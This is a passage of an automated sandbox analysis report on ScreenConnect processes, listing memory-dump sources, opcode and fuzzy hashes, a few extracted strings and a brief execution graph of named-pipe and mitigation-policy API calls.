                                                                                                              • Instruction Fuzzy Hash: 5601B170A052459FD704DF69CC4883BBBFAFF89200B15896EE846D7211EA30ED01CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3781caf545212bbc786f478505a4d05895a35b45cbf59e9bfa3f6505d63fdb42
                                                                                                              • Instruction ID: 11411e86d128503603008e7f6cd53f5d8be105f3adacdadd641f0ee8263a1b4e
                                                                                                              • Opcode Fuzzy Hash: 3781caf545212bbc786f478505a4d05895a35b45cbf59e9bfa3f6505d63fdb42
                                                                                                              • Instruction Fuzzy Hash: 8C01B131300209A7E715E669A455A6EB6E7EBC5220754C938E21E8B355DF34EC098792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b570cdc119c05ee3fe556b3cca5deddf425ea06268e5dfe413d6adc9f5d40863
                                                                                                              • Instruction ID: 38dd4f4e82c69fe8a2950fe5a81f30ef1bee514fad89470eb499d2735c1d07bb
                                                                                                              • Opcode Fuzzy Hash: b570cdc119c05ee3fe556b3cca5deddf425ea06268e5dfe413d6adc9f5d40863
                                                                                                              • Instruction Fuzzy Hash: 53018B71B101059FAB04DF6ADC4487BB3FAFBC8210710862AA80AE3200EB30ED018AA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 220a8e1430715644d12ee023bfe9a4981e7d31257646417c18a9ca8cb6dda08d
                                                                                                              • Instruction ID: 82b0886d6b1ddd74dc337c02895624da8889ae72b3718ef665fef8d6c1bd8bfc
                                                                                                              • Opcode Fuzzy Hash: 220a8e1430715644d12ee023bfe9a4981e7d31257646417c18a9ca8cb6dda08d
                                                                                                              • Instruction Fuzzy Hash: FA0188B6B0525A9FDF10DAB8D850AEEBBF5EF85211F04817BD904E7241E7309A14CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1c0ad655c923014a36f65d911e6283352e6538b1c545a5f73e6a21898b27b58
                                                                                                              • Instruction ID: 30733418253c1b4e81afdee9b2e47e26eb16870220def870f9e2bced7e1d1155
                                                                                                              • Opcode Fuzzy Hash: c1c0ad655c923014a36f65d911e6283352e6538b1c545a5f73e6a21898b27b58
                                                                                                              • Instruction Fuzzy Hash: 25112A35A11208DBDB14DF94C858BDEBBF1AF8C311F144929D401F32A0DBB56C85CBA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Instruction Fuzzy Hash: BCF0F4B4C00206DFEB00DB20E82976BBBF4E741301F018A59C724AB281DB741150CF82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a22cb5bdd5b931cd22352aaf77324c64aae3f4995ba683f045d744cc3a42e63
                                                                                                              • Instruction ID: 194d104906d34477250a2ceda201f8caa10cbb25d703a88866e7c0970f1a2a82
                                                                                                              • Opcode Fuzzy Hash: 6a22cb5bdd5b931cd22352aaf77324c64aae3f4995ba683f045d744cc3a42e63
                                                                                                              • Instruction Fuzzy Hash: EEE09B327043289FDB54DFA5A8145AE7BEAEB84770F14816AE90DD7345DF319D0147C0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d07842775dd766215e45e7727d859568946742b611d5d8cd61df599fc47aea11
                                                                                                              • Instruction ID: b982008d987c509e8ec63743511b0ee55a0412aacd812f0f110ce2233573dee2
                                                                                                              • Opcode Fuzzy Hash: d07842775dd766215e45e7727d859568946742b611d5d8cd61df599fc47aea11
                                                                                                              • Instruction Fuzzy Hash: 81F06DB8D4020BDFDB10DB69E825B6EBBF4F74431AF114A66C338A7280DB7455958F81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cc0f453e77c85da558dbd6c78721d9d02e810288df9d09bceea84c071431b64
                                                                                                              • Instruction ID: 665b303feabc06739674729b37a9bea84615a9aab6a75ebe1a9246cba2a6a9cc
                                                                                                              • Opcode Fuzzy Hash: 5cc0f453e77c85da558dbd6c78721d9d02e810288df9d09bceea84c071431b64
                                                                                                              • Instruction Fuzzy Hash: EDF03A35201640DFC325CF29D945A56BBF6AFC6711B1984AED5458B3A2CB72FC01CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8e71107f9ef634dbbe2ac61b21ed52c788076dca48f8dc92d9a6a3be58e74e5a
                                                                                                              • Instruction ID: 26b176aaa9b0198cac96d12382a631b32428c98473efeb8eeaa8a9f2937221b5
                                                                                                              • Opcode Fuzzy Hash: 8e71107f9ef634dbbe2ac61b21ed52c788076dca48f8dc92d9a6a3be58e74e5a
                                                                                                              • Instruction Fuzzy Hash: E6F07471D00219DFCB44DFA9D951A9EBBF0FF49210B1581A6D918EB321E331AA529F81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee28854d1ab8aed63453770452879d0a8c0ab3b725dbfd1bd143f339b4f62981
                                                                                                              • Instruction ID: 694d8c5a271875e49d50a6e571dfa9a5b2ddbab550372a1e6520034fd7fcd794
                                                                                                              • Opcode Fuzzy Hash: ee28854d1ab8aed63453770452879d0a8c0ab3b725dbfd1bd143f339b4f62981
                                                                                                              • Instruction Fuzzy Hash: D2F03A31E016189BDB14DBA8C828ADEBBF1AB8C705F104A69D402F7390DB796C05CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0afd373cbe770d4d182b512aebb22b6be8ec9804c26c0a752c79edf412c43374
                                                                                                              • Instruction ID: 7fe66577334599027d1923b3a00f00a79a48e59a0bbf0d7daea24ee19fe12693
                                                                                                              • Opcode Fuzzy Hash: 0afd373cbe770d4d182b512aebb22b6be8ec9804c26c0a752c79edf412c43374
                                                                                                              • Instruction Fuzzy Hash: 36F05E35700129CFCB15DF69C458AAEB7E1EF88710B0980A5ED05CB3A4EB34DD01CB80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 18bbba36cbbef7ca7358cdb04b5f29008905a3d2202f1795ce841bce7a3bba11
                                                                                                              • Instruction ID: ce10b1c429c91ef634826ac8b2540e29480f6661df6c5a30f99ae92a9b52bbb2
                                                                                                              • Opcode Fuzzy Hash: 18bbba36cbbef7ca7358cdb04b5f29008905a3d2202f1795ce841bce7a3bba11
                                                                                                              • Instruction Fuzzy Hash: BAE06575704208AF8744DA8AD844E6BBBEEDFC8270714C057F90CC7350DA31D9128764
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 581bd017fd2390e103dc0b57d719aced7a575d334ecfe71a41cc967508388508
                                                                                                              • Instruction ID: 7eebd51f295e35ae2b2978192c662eba64c3aaef1df21cac89ef66f85aefdafd
                                                                                                              • Opcode Fuzzy Hash: 581bd017fd2390e103dc0b57d719aced7a575d334ecfe71a41cc967508388508
                                                                                                              • Instruction Fuzzy Hash: ADF01735E00219CFCB00DFA8E8546DCBBB1FF89311F1082A6E109E7220EB716A95CF41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1197ab811b89a2a8fbeeb633423e71cd7920180fe4ca5049e2defc03b758460
                                                                                                              • Instruction ID: 8a627436b0c0ce283aa6eafa8362fd4ea23a204b70481204257875b0de06c239
                                                                                                              • Opcode Fuzzy Hash: d1197ab811b89a2a8fbeeb633423e71cd7920180fe4ca5049e2defc03b758460
                                                                                                              • Instruction Fuzzy Hash: FBF09AB4624606CFD724CF14C528AAABBB0BF44314F054A5AD480AF2A2CB35EA44CF96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 104d02c252be27d5c69ea3bd721a6fd7e0e1329ae55dbd79dbccdca4fd782b3f
                                                                                                              • Instruction ID: 6f56a5274c63958033ead029c610f63b8c8675ef3f0aadd199b7fb06d317e3e0
                                                                                                              • Opcode Fuzzy Hash: 104d02c252be27d5c69ea3bd721a6fd7e0e1329ae55dbd79dbccdca4fd782b3f
                                                                                                              • Instruction Fuzzy Hash: 4FE09B32B042149FD7549A7998143FE7BE6EB80760F244679D809DB795EB318D0153C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9a42c3a198ac3df744bbd9da73ecc3f4431315386382e92def285e1bd8ba0901
                                                                                                              • Instruction ID: 0b0f89f55215788ee634a4eb6fd17680247cc1426aa8df02b9b16dadc5377817
                                                                                                              • Opcode Fuzzy Hash: 9a42c3a198ac3df744bbd9da73ecc3f4431315386382e92def285e1bd8ba0901
                                                                                                              • Instruction Fuzzy Hash: C1F0E531806609EFCB01DFB8D8096ADBBF4DE9520071045EAD408CB643DA311E499741
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab7c76101617bad0d5c579bb7c82d9c36900a8e1c306ea5602b28699e54f15e4
                                                                                                              • Instruction ID: 0fba221bf15e012fa850b305cd998cd0e957fb8d7d92cd8e9864a34dc2f08c89
                                                                                                              • Opcode Fuzzy Hash: ab7c76101617bad0d5c579bb7c82d9c36900a8e1c306ea5602b28699e54f15e4
                                                                                                              • Instruction Fuzzy Hash: E4F0D471E00219DF8B40DFADC840A9EFBF4EF49210B20C16AD918E7210E331AA12CFC0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ec9b598f9e4c794b19f26c82aa469f440c1865043096e6e60b071e342fa1dd6
                                                                                                              • Instruction ID: 5c9810947bcab9787c38361cf6689cf609253a1eebfe9b928d4b7a68c1751dcb
                                                                                                              • Opcode Fuzzy Hash: 6ec9b598f9e4c794b19f26c82aa469f440c1865043096e6e60b071e342fa1dd6
                                                                                                              • Instruction Fuzzy Hash: 88F0D472D002189FCB44DFA8D8015AEFBB4EE45200B2185A9D919E7251E3319A129BC1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41ad7c5e628693abd47b504b63d8baecc1786cd5b6a59220d4fa617f02bab7e9
                                                                                                              • Instruction ID: 4e164e295e199184650546c519ca0426d46b1ed138d69c3bac1b188ee3bba24e
                                                                                                              • Opcode Fuzzy Hash: 41ad7c5e628693abd47b504b63d8baecc1786cd5b6a59220d4fa617f02bab7e9
                                                                                                              • Instruction Fuzzy Hash: 89F01572401208FFCB02DFA0DD008997FB6EF0A200B01809AF905C7222EB329A21EB90
                                                                                                              Memory Dump Source
                                                                                                              • Instruction ID: 78768af71a2a1f7192eaf69dcd93d0388b98b048798512418ee0ea2b8e115dbf
                                                                                                              • Opcode Fuzzy Hash: a7e91ae5a31f61771740849be2992a7a411d2934204cd1a88633a53fb2e2ac91
                                                                                                              • Instruction Fuzzy Hash: F6D01734A0120DEF8B04EFA8E90659DBBF9EB45200B1045A9D80CD7200EB322F489B80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5a9e32a00f3d4d641e66cdc806c81a37bc902d0c29530832113ed49537eab967
                                                                                                              • Instruction ID: 5886b6667aa67344873635458b52deaa10b36ccc5bd560866675e0e32de6dff0
                                                                                                              • Opcode Fuzzy Hash: 5a9e32a00f3d4d641e66cdc806c81a37bc902d0c29530832113ed49537eab967
                                                                                                              • Instruction Fuzzy Hash: 13D01730A4120EEB9B00EFB8E90165DB7F9EB44200B1447A8D40DD3200EB316F149B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0517bff3022ce39d9e60013a85cafa09bdc533a40eb71894b3b405fae54bdcda
                                                                                                              • Instruction ID: b5fadbc6e2a4a65912b26862c1ebad4501a125ebb1bc37160a09abcc9bb991f8
                                                                                                              • Opcode Fuzzy Hash: 0517bff3022ce39d9e60013a85cafa09bdc533a40eb71894b3b405fae54bdcda
                                                                                                              • Instruction Fuzzy Hash: EFE05BB5506540CFC702CF78D584C847FB09F6560831A82C6D049CB323C631E905CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aea8d700979a839deb4d8be51d2089ef1a70a4b15102887b05a34aad9bc7a680
                                                                                                              • Instruction ID: d23a9d311016ab8cdcea06738769fc0043b1cf7f9bad484c648b0685107dfd34
                                                                                                              • Opcode Fuzzy Hash: aea8d700979a839deb4d8be51d2089ef1a70a4b15102887b05a34aad9bc7a680
                                                                                                              • Instruction Fuzzy Hash: 4AD0C73141470D89C701BB78D4544A9F778EED5200F00CB5AE44957121FF70D5D0D681
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89e106ae7ab7cbec0d0e31ecccac2934c57872752e3267abc463abed1a3758db
                                                                                                              • Instruction ID: 63913bfaf9569dfbc35bdd59931840e7e918f72c00862e0477c79981a37c055b
                                                                                                              • Opcode Fuzzy Hash: 89e106ae7ab7cbec0d0e31ecccac2934c57872752e3267abc463abed1a3758db
                                                                                                              • Instruction Fuzzy Hash: 18D01276015200AFD7129B60A905F407F61FF65309F0788A4F1495B132DB214021DB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 039dbb949224a94060d5f59024c9e8ba391646d7f1e27d273cabb54e6582136e
                                                                                                              • Instruction ID: a16fcbd1cb31c29ff8e9e97743da277d3147b8ffa0d3eb04b26bfa0e5cbc1345
                                                                                                              • Opcode Fuzzy Hash: 039dbb949224a94060d5f59024c9e8ba391646d7f1e27d273cabb54e6582136e
                                                                                                              • Instruction Fuzzy Hash: 01C04CA584D7814FDF16076158A90C52F70DA5A20134784D6C05785452995CC54BC711
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                                                              • Instruction ID: 50febbe312b41ff2c4c3a49cd703755e7e3a6811debab3536aaf097181569e9c
                                                                                                              • Opcode Fuzzy Hash: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                                                              • Instruction Fuzzy Hash: D3C002792501048F8700DB58E688C117BE8AB486143258194E5088B322C621FC018A91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 31886de6e0853851dab88549b0286ab42aed480dfdc09825fad50571946c1f1b
                                                                                                              • Instruction ID: ecc656c35895e1f8ae178bd5a501ec5e836ba9443b0bf4c9557ce5a95d720c3c
                                                                                                              • Opcode Fuzzy Hash: 31886de6e0853851dab88549b0286ab42aed480dfdc09825fad50571946c1f1b
                                                                                                              • Instruction Fuzzy Hash: 6AC0484240E7E06EDB03A6310E69A4A7E206A835523CDC1CEC8868F15791189918A6B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d03c6c3d46a9ec55475b1a61b4fa9c1f178b675aca84af734de6575c0a12e33
                                                                                                              • Instruction ID: 3b4f0e3faff8519a2ab7d925c824fdb9e9396ff951742404309c4a5a10b463a6
                                                                                                              • Opcode Fuzzy Hash: 6d03c6c3d46a9ec55475b1a61b4fa9c1f178b675aca84af734de6575c0a12e33
                                                                                                              • Instruction Fuzzy Hash: AAB092351884448FC700CB78D484C887BB0AF1922431102D9E00ECB633C262D802CE00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                                              • Instruction ID: fba1df006ee47b4d62fcc1013010dd0c3d3c4d475ad279116ed82f1df4468255
                                                                                                              • Opcode Fuzzy Hash: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                                                              • Instruction Fuzzy Hash: D6B092311502088F82009B58D444C0073A8AB08A243010090E1088B232C621FC018A40
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4012479988.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_bf0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DUu
                                                                                                              • API String ID: 0-1869729964
                                                                                                              • Opcode ID: 7a98a9b428529c33e0b2a611168b1cc86beba3320d04fbfc51109cdd1d87c4d5
                                                                                                              • Instruction ID: 43cb8a2a555117eb0d8ea01a82bb4c9903991a979b2d85c2685fc529dc67a846
                                                                                                              • Opcode Fuzzy Hash: 7a98a9b428529c33e0b2a611168b1cc86beba3320d04fbfc51109cdd1d87c4d5
                                                                                                              • Instruction Fuzzy Hash: B5E15031D1061ADFCB05DFA8C8405DDFBF2FF99310B25865AE515BB210EB30AA86CB90

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:10.6%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:11
                                                                                                              Total number of Limit Nodes:1
                                                                                                              execution_graph 18819 7ffd34413642 18820 7ffd34435860 CreateNamedPipeW 18819->18820 18822 7ffd34435993 18820->18822 18823 7ffd34413662 18824 7ffd34435a00 ConnectNamedPipe 18823->18824 18826 7ffd34435ab2 18824->18826 18827 7ffd34418014 18829 7ffd3441801d 18827->18829 18828 7ffd34418082 18829->18828 18830 7ffd344180f6 SetProcessMitigationPolicy 18829->18830 18831 7ffd34418152 18830->18831


                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: pYr4$xYr4
                                                                                                              • API String ID: 0-2110079078
                                                                                                              • Opcode ID: 7bd4e6591b357d6a492e816403fbcc99a9cd26161011102cf24a0f8e201f55bb
                                                                                                              • Instruction ID: 72ea2ff5219a936ac2da992f0f22a3d8874fef7b669ea60dc1076a02194ef887
                                                                                                              • Opcode Fuzzy Hash: 7bd4e6591b357d6a492e816403fbcc99a9cd26161011102cf24a0f8e201f55bb
                                                                                                              • Instruction Fuzzy Hash: 29E10871B1DA478FE7A5A72845B16F937E2EF86390F110079D14DC32C6DE2CB9069380
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b1f71325a333ff59a3f4550605d91a025f68238baceb197301aa43fcbe5e4f9f
                                                                                                              • Instruction ID: 7da55fb460fffcfd647926d875c7dba74a681ada5c7d3461569e0ad48d592871
                                                                                                              • Opcode Fuzzy Hash: b1f71325a333ff59a3f4550605d91a025f68238baceb197301aa43fcbe5e4f9f
                                                                                                              • Instruction Fuzzy Hash: 0EE1FA71B1C94B8BEBA5AB2885F16F937E2EF86380F550079D64DC72C6DD2CB9059380
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 59c71dc5d3d78ec9ce125c7338ab2c3fc8b7ce23f31e28749b24df26345055ae
                                                                                                              • Instruction ID: bcb220a747c1d994f2b85ceb67ec9d621fc0b6e212fd194a33533894389e1a86
                                                                                                              • Opcode Fuzzy Hash: 59c71dc5d3d78ec9ce125c7338ab2c3fc8b7ce23f31e28749b24df26345055ae
                                                                                                              • Instruction Fuzzy Hash: 37C1D971B1D94BCBE7A99B2885F16FD32E2EF86390F510079D64DC32C6DD2CB9069280

